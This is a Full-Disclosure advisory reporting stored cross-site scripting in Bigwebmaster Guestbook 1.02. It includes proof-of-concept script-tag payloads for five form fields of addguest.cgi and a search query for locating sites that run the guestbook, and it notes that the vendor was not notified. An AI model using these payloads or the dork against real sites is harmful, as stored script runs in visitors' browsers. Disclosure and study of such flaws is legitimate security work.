[Full-disclosure] bigwebmaster guestbook multiply XSS



Affected software:
Bigwebmaster Guestbook version 1.02 and down
Vendor:
http://www.bigwebmaster.com/Perl/Scripts_and_Programs/Guestbooks/
Introduction:
(taken from vendor site)
This is one of the most powerful guestbooks that you will find on the
internet. Visitors who come to your site will be able to leave comments
and other general information about themselves. If you want to know what
your visitors are thinking, and if you want a fully customizable script,
this one is perfect for you. Features include template files to fit any
website design, 9 standard fields, 9 extra fields (customizable),
unlimited entries, and easy to use admin area. Full online demo available.


Vulnerability Details:
when adding a comment addguest.cgi accepts javascript code into
mail,site,city,state and country fields which lead to javascript cross
site scripting when viewguest.cgi is accessed for displaying the content
of the guest book.

POC:
http://www.example.com/gb/addguest.cgi
name: xss
mail: xss@xxxxxxxxxxx <script>alert('XSS in mail');</script>
site: http://www.example.com/ <script>alert('XSS in site');</script>
city: <script>alert('XSS in city');</script>
state: <script>alert('XSS in state');</script>
country: <script>alert('XSS in country');</script>

google search:
intitle:Big Webmaster Guestbook

Vendor Status:
NOT NOTIFIED

Solution:
I DON'T CARE

Javor Ninov aka DrFrancky
http://www.securitydot.net/

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • bigwebmaster guestbook multiply XSS
    ... Bigwebmaster Guestbook version 1.02 and down ... (taken from vendor site) ... your visitors are thinking, and if you want a fully customizable script, ... when adding a comment addguest.cgi accepts javascript code into ...
    (Bugtraq)
  • Sakkis guestbook V.1.01 script injection vulnerability.
    ... Easy to manage and configure asp powered guestbook. ... Works with MS Access database or without it. ... Vendor: ... Vulnerability: ...
    (Bugtraq)
  • [UNIX] phpGB Cross Site Scripting Bug
    ... phpGB is a PHP/MySQL based guestbook. ... When an administrator tries to delete this entry, ... the attacker is able to obtain the session id of the ... Filter all inputs for unwanted code segments like HTML or JavaScript code. ...
    (Securiteam)
  • pforum: cross-site-scripting bug
    ... pforum is a www-board system using php and mysql. ... registering a new user for malicious code. ... a malicious user to enter a username containing javascript code. ... The vendor has released a new version, which seems to fix the bug. ...
    (Bugtraq)
  • [Full-disclosure] Microcart 1.0 Checkout Cross-Site Scripting Security Vulnerability
    ... Vendor homepage: http://microcart.sourceforge.net/ ... Microcart 1.0. ... Injecting the following Javascript code into any of the affected parameters on the /checkout.php page will trigger the vulnerability, causing the page to return a Javascript alert box. ...
    (Full-Disclosure)